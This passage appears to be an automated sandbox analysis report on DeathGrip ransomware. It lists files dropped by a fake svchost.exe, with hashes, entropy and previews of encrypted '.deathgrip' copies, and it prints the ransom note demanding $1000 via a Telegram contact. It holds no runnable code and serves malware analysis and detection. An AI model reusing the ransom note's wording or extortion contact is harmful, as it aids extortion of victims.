                                                          Preview:...........!T.)...8H....B..4~ 3X...A..9.^..i...Y.[.....&....*..p.q.5..2...B..=`..o...g.....7..a.d.....\*.;.GlO[c.c..%....a...O_ .PH..H}G..<..l...6...o...H%.~.b..........~....]"....f...d-.N<.s........'}.{..3.bl| .0...C.H..N..L....sh.-..shn.v....`.!*y......._0.JD.......e...5.......>.*..^,......d.^.`.`..A..s...>..>.:..O]k]..'4?...I>.F.....Q..X. D.:a........'0....i... .+O.......H.+DR.D.....<4..!2.H....a...7X...`....9..5b.p...c.......V................B&..#............b #...*..8...{..M.E......2..F..%.fR...F'.l........^..kQr.H.B3..F]l4..s..*..^xI...........&4.s...,....a.C.....*+. ...t.8+..s..."e-$o.x.D.:..4.7s.e.a.Q...;.@.....x.cd.s.f.........O.....A...K..=....._.cS.....Te#|c......z...Q...42.=..%...;.1..v-.U|R...i%..31.u...|.............a.pl.a"..SA.c........m..K<#C.3p.p.1f&+...YL!~..Qlp.m9...Ik.)<W.d.....n...FN.._,.b....=T. .w..C.wQ m.cp..........K.!x.....].....!:._...h...Q..[U..S...\.,|.7.X.N..:(9.Le.h]xV..!A..1o....z.N:9.c...sV_W

                                                          C:\Users\jones\AppData\Local\Temp\aria-debug-3236.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\aria-debug-3236.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.104379284989339
                                                          Encrypted:false
                                                          SSDEEP:6:bV3Q3UoLd6yJqppkFnHkLsLzjLPE12w7ohPq25n/T9khnSVY5DXIsaYP5EqDLEup:hQkoTJGokLu7PzSoAoBOksRaYPIuat1G
                                                          MD5:2791302E8CEFC4BB0F344D3DFC7571D5
                                                          SHA1:3060AA62980C6C117D55B4F94EBAD7C0F525C306
                                                          SHA-256:E5EE89720748F80DA5C9788518892D55435B409E6382E22AF9A637DF5FCDDD46
                                                          SHA-512:252509B97947B177C54BE506B919212FBFE6E5BF0AD34CCC7604C4B6714F01733C393EF5337A8441D907B082599A5E58AC8868B78ADC9CBD7D5B9D2A9030BDC6
                                                          Malicious:false
                                                          Preview:........FP....i....H...Rn22aqWsoVARg1wwEzHKM0D/OBgaKPi5qlb0ApyTP5a5/cG9rhlcvyNzudVB+VSAWEPF6Eyaxptz0WUySuNynjr1fCdk4uYN0bJSO0ri/Slrjqm7eM3pL+VO0ejlm3nHM8mZVW/lKnnE4UKKlt4HyQZTDqQO3FJ6EpPgoJxaLtUV8bPxQ6pPn4SwFZXiy5cqtFKRNVzMTfoUjL4ogKn0owV9mZ1P7e36k7T1ztiXVTUR/H2ZR7nGvVdtjIMaA5rXJOtGEmiRiopr08NRQz8Z8sEhIfS6afS7gji/KiDFJ2wSQviH6VMF7qQrCL2G4g+EYdpSbt/a+i+36QPeqg7NIg==

                                                          C:\Users\jones\AppData\Local\Temp\chrome_installer.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\chrome_installer.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6288
                                                          Entropy (8bit):7.967234313204805
                                                          Encrypted:false
                                                          SSDEEP:192:CgG0/o2zcB503NcYeA6d5eY7F9JT3+u/fIkNTVjNbL:fjNzcBu3NnhmfJTZI+jJ
                                                          MD5:35F22BE46CD2E5EBD16DFBCDE4A5331E
                                                          SHA1:F6B9D94A975B03D126FF42E73D90CB5CAC21A860
                                                          SHA-256:EDDA6BB70898B72D15B813F48B45B53E01C0730165059155D85FAAD64354454C
                                                          SHA-512:FE91DD3CA26CA3C54FC4B7DE452E9E4C7EBB2A4DA4CA8E4C090EAFBF85E8A1EBAD092A78AFD47611FA5A112623E9AC3A066BD26BD027AC03735A4209919EAEE0
                                                          Malicious:false
                                                          Preview:..........5r.0.3p.`...a..}]tEb.....~YY....;..@.....+f.8.p.{.$..(..l...`z.C.s..D.J..u..l.._.|@.$F..1W."Cf...Re.kaV.#K.6..8F.wq..}..%~...~6>.a.....l.fX..c.d/Q........)F.w3.u}....^&.....5._.1.n=..9..Tt......r_...NA...I......p....U.;?..I.s..H.U..M..).;[JM.$..J....#5.y.O.....>.1n}.g.....LG!D/V,I2Gl..L.u...J...|...]..+..n..z.[....._M.my ......8.k.2...`~.Z..O..hS..C$)...:......q...T,_.Y^..=..q...}..u]0p."q.V...Id...qS_.CT.N}.a....$..[...NJ..0e...............`.|..i........v...fQ`=............i.w..g....H7Wn.t,K.C..UaS....o;'+........:.N.!.I......H+%..^.%$.Fe...../L..<.{Y.t^I.=..u..Pv...w....T.?.&x..a.....H.`....>..L:R...{.V.:.).. b.y.AI.....2.1..n......&c.&;z..UV5..|r#tR..Q.&p.'.:Zr..$.s.,9..BMg....gN4.m.5f.......Rt..3.:.%..D..2..@<A.../R}r....I...dh;.9..../...._+.q..G.{.&....J.~....6xZ.}"t.....G..s7Pb+..`)t..?.P.....c..s..........+...`.Z..oa[.8.X.Tm....9)>N.g(.....I.@.....F...&!...F..m..a.....@....p.S...Eo..#F.Q...a.'.%Ht.l.o..33Y/..4.c....

                                                          C:\Users\jones\AppData\Local\Temp\jusched.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\jusched.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36720
                                                          Entropy (8bit):7.995028162241055
                                                          Encrypted:true
                                                          SSDEEP:768:49DAYP1qK6HO+vsuzOYo28M85w68wJd5bUZFUA0XJQuvTtyODhi:0Ay1qKdmOZFw5wJdcFvSJQuLcODI
                                                          MD5:828F82CC7F385602AA24067E3431BA7F
                                                          SHA1:55CAD6C5786941F9278B8A687ECC5EE6234F5502
                                                          SHA-256:4D490C75CD0C74FF4F18F6E9D0722FA0C371D0B000A6057F7BA72FEB411FCC5B
                                                          SHA-512:68385593445E748B2A9C334821008DE720431605DABC8E62534CC707E76E884AAB0C0A2CC00F7E2B3358DAE9CFF0EDFB92E666A5A50C8C9B1440DFE1143CA059
                                                          Malicious:true
                                                          Preview:..............;....o.....|...........^X@.....d....h7..M|......*. .;.m...|H[!...X../.......n..|.m..QFd..)._,...~.?l..5s...k;.wY..h.WJr..CI].M...9X.K.L-..6f ....n..42`.....K.0]....81P.DxG....n.......@..3..w.....5...v..X.D.N.....U...P(+f6D_..0.(..$&y.S...pU...;...=*sb...J.......t.e.fB-.P....7u.U..."...X.....<.....e..g..0?.h....;c..%h_;...bv."..h.G2....s...b".%....~^.e.....$.d.."...}{u.3\..C+.}o.6MC.S.....tb.)6....z.Q.[.G.@^tH..R.gzL.o.....wU.&.mm.....;~.S..~]....n5.k....4?}..........::U.C"....t.^p....|3[X..3.C.o1...UU....lk.)]......./N...3..J...|e..5.z.^.(.5w...U..`..35{x.b..Q....C..I...1U....,...n....2.Ccv.f.+..-...8%2xPy..AQk{6..d./r....^..*.<...28wF.......7.rI..........}..2p..s....].g..Fk.;.5....$..r.v"..G.2.a....c.....9.....*Ks..A[.......J.S..l....O..B-H.....^k.Y...~........,.s....+.,.X...Oz.,.&q.K....{.r..K.JL.u...NQ...G.G.?.[!#.....2i.]]D.)l.."..v.....^.Ko..k.k}...|X.(Ru...1qLJ+...;4...a..{....s....I\..a....(...`.....

                                                          C:\Users\jones\AppData\Local\Temp\msedge_installer.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\msedge_installer.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22112
                                                          Entropy (8bit):7.990912630033864
                                                          Encrypted:true
                                                          SSDEEP:384:i98gZzfPlsXE1p3SSleg1FxnSfjhR91mU9ewQDTIadJc3mS+YQ1YQnWKR:m8ghPl4EmKegXxnS1D1ZdSIaUA3nR
                                                          MD5:FFC1906E96A1FBB435769D67929752B9
                                                          SHA1:791DD6227360DDEE39B63B6F97C006054A639464
                                                          SHA-256:F4EA90DF451F9591FF58DD8824E83BE209B1185EABE502CB85C9BF9C0C269509
                                                          SHA-512:C0EAC6918FA52E4C742B0D699046EB4300D16DEA1E59503247C18072B4C5673FE79ADC3A7E81084873D721C5E5332BF8105FB15152B3F6BB8FA9884FCD02E15E
                                                          Malicious:true
                                                          Preview:......... ..a.|...B._.9N`....4z.4.g....-.(9.i.^.....8...O.my.......|I...Q...^P..q..........[.T.:.....b".{h.y.(^.......4.B..C.v..k.....b.#....I.b....m.....zF..._..w.O.*.N.l.........].....:+..v:...>..^.o.x.(.....v......G.;..'.^....$...w-z..o....gU.i...{Lf..m.p.|@.....B.#...5.!q.C..U..#7.<U.A6.N. \pp. ......?........4..'.pa...r.t....wv....A..cO..-.>.FQ.Qwg..f6...}.....X.V..i.g.*...<.$e......uV..y5f..m.^.T#..%.2b..t..'.........w..,f.t.|.hY..6..H_...."..=..#nr.I...9.. .S...g.6. m....v.H~..U.q.E....v&!FE>.SM..2....O....w{..^.I.z.k..9..^......5.=P....U......s.9.....V.7....r...u..H.i..E...w....j...fh.=........9l...^..z....dP)..y.....m...7.....e....N..t..JBEz.<.a...@v..&.R<.9x......9>.........6......bl.*:g.....P>...^..*q..a..]......]...I.l..B.n...@..lU..;...hd.|...*..h....%1...H;9....FT...z.ox-xM.!.r.........+*R.p?v~.%'%!8..@D..1.RW...UY}..]4...b}..9.CN?...=)8.z...U...b4....l.<]..BB....w'....&.4...d..R...l....u V...8. %.p.I.~Q}..h..9.t.X.!~4qG

                                                          C:\Users\jones\AppData\Local\Temp\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Temp\wmsetup.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\wmsetup.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1056
                                                          Entropy (8bit):7.586940602545
                                                          Encrypted:false
                                                          SSDEEP:24:JR0Cq4AeeMP8I2PFICh6RIR4mi5JlPxcvgRy7W5DzdZs904:JR04hFP8I2JweRRi5Jgvg07ijw
                                                          MD5:6C3F526C6CE847325AC18FB4C2526368
                                                          SHA1:3D1304D32951E49752FF4A1355722794BC922F3F
                                                          SHA-256:09111CD2748DCCA46C769CD51856D4D0211F0469ACAEF38C93EB506F65BAE5DE
                                                          SHA-512:0B4C2DE02084E38E4F6174DB44F41747EC1D006C2EE1C09AFA1BBDFF6F3F9BD0029B57923974CF2B00673B0E23245B8BE9161370DDE34D6EA88C46BDDA3EDA46
                                                          Malicious:false
                                                          Preview:........(O7p...........^..C.!}...S3f(..;..Zr.}..^.1|[....9V.Z..Z.a..1.G..#..s.t.W3]]......0\!oD_w2hK[...6.....\.m)t.fH.._..ZD3.i.@.fx9<...).N.mB^....c....I...G...2Fx...4sE"._xV.'.OaZ.7...u.W.!r.f.....J.e,..1b<@.P...Q.|pX...Z.......O;M..%.H...^ Qm....c....Fl.....u...~)@d}X`.p..\.73.t...$....2<.c8.......-.?.....`.....h. #..Z.).r].....}." ..n.XO.C.\.I.|..\..]'..{.E...ut#I6.[.`.et...Y..v.8[.......WQ..p.+i..2<.E|.d.{.#.8..PF.....]R=.....l......0x.W.*."..&w~....8..K.>6hy...?..:..z.....v....;+.o.\..Z....K.|..jD.R.MN..^:.F>...r..I[.b...x...Q.;..k^C.K.u(Kb.v....3.AR........=..Y.e...B.}.2.J. ........V;...o.6.....8.."...(;9W;AGt..p.B..M.*.o....d^..v.E...s.k:kV...4W...:..;Z.....Pb.f.........u..LnMwIV2hjlhOXM5i69r5aC73zrEPebstc+/I9gtbsybyVcu5QhmUsvAlLwQj3IkkDnCfYNkcuFfhtSZelDeL+1I9wsiK+LhMQd6hQkGXwdjqxRqAJGx8jNlzZjK8DNxnlFQkYylXT1w7lexkJ4shnIzgApeDCRGma0zakz0bGCh3MMHicYEz1NNHa82vf7eUPTFHWEq3yJpwhen/bkA2sksobfkmn/XKLAx435W1BKnGnSfK6aKoJDEGWs16Lq5D1/TxS1T77EirHY98XqD6VME0GP7wih6m

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\All Tasks.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\All Tasks.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):464
                                                          Entropy (8bit):6.649203610563169
                                                          Encrypted:false
                                                          SSDEEP:12:xRjS1eGLqzeucEipgPbM25eGzVBmM70vNxM:x5SnLqNcEzMSeupkxM
                                                          MD5:54C1C3387B242B3F790966FE4A2B4F09
                                                          SHA1:BAFBD55EFDBC8B73A7616901A9B151357DA85FFB
                                                          SHA-256:223E6744F1C97E70C9817E0D5BF019B7E6BBBDCCD08F1CCD1D8BD619A2E54F27
                                                          SHA-512:2197AB8A94D0802C8AFD336AE28F37EE4FED4611006C68E15D1F6488EABAAF1D5427C374D52EA638FB1B1559A105899ACD3817F3CE64F0F9A0056E28CF2ED8F9
                                                          Malicious:false
                                                          Preview:...........J..NM..G...0D.B.).ub..Ff.tF.7.[..o...a1.,a...*..f..<....x...H.....qW....F..w.s.]....-K..Tw...B.Bd!..b"`.RZpzlUTiC57mpudIfJEy1c2p3jUjOZnmVeHb01kcopi0kgEiPl9Wbed73hzNKTknnQJuT+5dX7eWEVjaCHRvbAv0TDyT/QLFz+26U5Y7jwvk9EAZYr1zJrr66tc9fSu8ifRgEUQYwZsCF1vckMZEHBNKWWSiZMy3rssgHVryshjF2Hw+TDDOIpzmqm6pPZnwgSYe3Db1yROjCSNokpyhcocKqu3M9rctjMjX/Nz+LitHNRqUo6u1cGtRD48SQmi6CYh7pOzdppWE4Ogp2zsEIOfa+YHlXZccD2NMZI82dlcccFg3k995i16DyyfnUywLjLgvlwj8Z3qOTdEbKfbT7A==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\ProfessionalRetail.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\ProfessionalRetail.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1840
                                                          Entropy (8bit):7.845766525622224
                                                          Encrypted:false
                                                          SSDEEP:48:U7SNcUMc7WhckF5ZfRizlmOyr9h+cQXX6D:YSIcSFF5Z5mlmOyrPBQn2
                                                          MD5:89B4AF70E7556C33B79763038662E658
                                                          SHA1:97C70EB8FB7F6E83485F47572B7CC8D64D8AA030
                                                          SHA-256:FB1BB4C413DB076A34269BB70B418154433719EBCC9E5CA0F1A3A17675C61419
                                                          SHA-512:73AAC50F7696C657444601DD23BE430E75D49CC322CB4373A2320930983CB069D433D7808D298559A664300EDFD90D9EEB6AF6028363FBBB9DBAE4BAA4C4976B
                                                          Malicious:false
                                                          Preview:.........f....u$.{C9.-#.4o&...~..\;2]:B.g..D..,...<..W........J.{.~)......5.m.R.v..n...dH.....T.E}S".@z...'../U\..T<..!|..\...(b6...q.^.=R..HG...c.....jo#e\c..~.!.(.......QLA=U)o.o.........D.{.,VP.4.S.._.i..yP.?..)1.tu5P-.b....p.I.....D..6...|6.W.....&.......U...C.V#.QZ.....&..-...K..?+.B...4vO4k..G...T{s..u....>.I..i......S..0.L*?T.4...hnWt(..m..Xe...@-....!].I..La5{Q0.j....~!..OFngb9.X..?.h.*e'..I..R....T.g..Q.Ge.'......6,*..'......o+.5..g...H.}T.#`..{.Z.;...U.<".!|..>\.....i.....7.)o...y.e5r..gF..a....bb^..8.X.t.<.{[..<...W\.|.H.......&,v).F..*.."V`....:.'g..BG9a.~J......a&.+..~.H6...0V..V.A..8ei...1..|U?z.iV..4..3.._.....(..]`.V..m.....r..>|....n.;].LrU2+|....-...k.=.$..%.!/.S......D..|..].4...tV...?W.......w,.`..Y.........._]p.%..<.!.....M.e.0.C.}!o.%.I.G4.oC..6......<s......Hw..r...4%..?O'm..K..&...b......!...e4..s.....M!:../=..;.b.K_w.D.)O.n.f.......4.@tz,Qa.........A.S.8K.{...C.d.;..f.:."..#]L..4..Jz...].{.....Lx.....ck..y_.O..p....

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\System and Security.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\System and Security.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.702580710669612
                                                          Encrypted:false
                                                          SSDEEP:12:IctS0Dc+s8gmgnBZ5+TqAXfg5GliRxGE8vqPhvqhcT:Bg+s8EycGERxl8vqZvP
                                                          MD5:20389B5EAD4981688BD5D1B4A1B81DDF
                                                          SHA1:E3FAE9832BDF5DFA518D91C1F6DAAF5CFE47B701
                                                          SHA-256:1B2843D90BA68057134CDD35E64D5D6A6A6EBE5875BBDBB8AA73599EC7605A7B
                                                          SHA-512:D04AB463D9349827AF5BFA2E56F2F2E790CB56D089ECA85465654C56663F777323056E6034D6269BCF48F4244F360F020340DDB921ADFC935F9142889AE5627D
                                                          Malicious:false
                                                          Preview:.........VT..Z.....m..\f...?]..2!.7e.=....>.A.|~.a7.U.F.vQ.MxkJH\.,h...0mS..N.s.......6|..'.d.O.(. ..w^.^.D....v..+~Ig.t?.o4... ...AnqoBMFEXWVcTnrGOxGFrDQul4j3CrzvL7inTuojFsnJxrwfhdfeDvSYktbz9+EYLOV3FOEtrrRU+zHVaUzhYtZxGgJaK/zyb6z480DElljXfIxDdh2o9yLyC6xXVidS0tJUHIHxnHoLxke+VI9sQ12mhIga6Y5PXPEtvRYBpwOVviQ+SLsiXn5wYPv+E/B+0nRG0K1CkwP8s3KzWtk2AJIF2RlB4NXKKFdS3pfpjCptdL7MjTFHWv8n+623cu6VUUaWvTuwvGrcCrM3wkLYt/X6GWYNM1uKZ8Mpm8oj51r+kKZeCNmzSO+7wfa+cG9wZ0FJ0OyMZbl5e+Jw1VV06g==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\System.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\System.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.771119588123648
                                                          Encrypted:false
                                                          SSDEEP:12:fiZmynEL+NrSyx7HRmH+95DBUqjaNzmlnGdtBbKNcNvCgosHLpyU1CFZ:KQynrYyNRo+95B5aQlnGnIWo2LwhZ
                                                          MD5:D262BA777BB3C7ECD59D00448217EC89
                                                          SHA1:566828853926414F03ECFE30A80B9097582F0F92
                                                          SHA-256:8C133A379843FFCE0FC6378F9EFC9EE2640F46F4465F3A54C6C8F556CC4234A1
                                                          SHA-512:68F72BB2D939B374654BFC876234981F1FB92A5BFFF755C3730086AC6BFEFCE99624629BFDA8F1F6A9A94B9C1FDD63DCC0EE66925F3A5D421C39C875495715A1
                                                          Malicious:false
                                                          Preview:.........q~.5K...@oQ..JNE...1..G#1.xK_... r.+.w..EH3..e6Z|#M....w.8.t...6..3Xj...W.._..yWLz..g&......d....A.J..E....8}.b...6YH.HN.O.1c.q..Ke..^#&u.....<.d..qiFkzCDjOqjDNV55vIjpyBWsQdfX3CVnFlH+cSSlz42pdmCJy/TgimscZ9grHkw2+e7nrZf2CqP3F4IsDdyvqgPYSD/MagBxLS+wrQQM1arPQYqf9MQlhuDE4VwUNFBp66bnNpXpbMfIcJlxeu2evbrHwuADTMxF/RLgVexsLi7BQEaUT/ZS2adTi2tOkDmtnZgy4q6i8kJIZBl1FWvvxj8gv6LiFH6yz3XGPLMw/MjGBovLIHplLHsni2/Rl58NX6CN0+gy9Wc2i63hP2yjb4t6H4at2DwKVJxEcfU4IRcjLtJ7pSRbad3zQmSodbzL667Q9fJ/YOToMuIriAyqNA==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):464
                                                          Entropy (8bit):6.671393561016944
                                                          Encrypted:false
                                                          SSDEEP:12:GwHUrmGUgUoOy8zNODFg5BfchvUxhEC59rN80cwzvVv:RHUrmNZNz4Fg5jEC5nGwl
                                                          MD5:8CDF861ECF917FD2F896F76BEE43D3F5
                                                          SHA1:6A8ED0999208E2FCC0ED6CA36363706715F63C77
                                                          SHA-256:9869B2F0703BFC67D657E2A33C7DCF273D05F56E80E027A077236CAC0DC7AA71
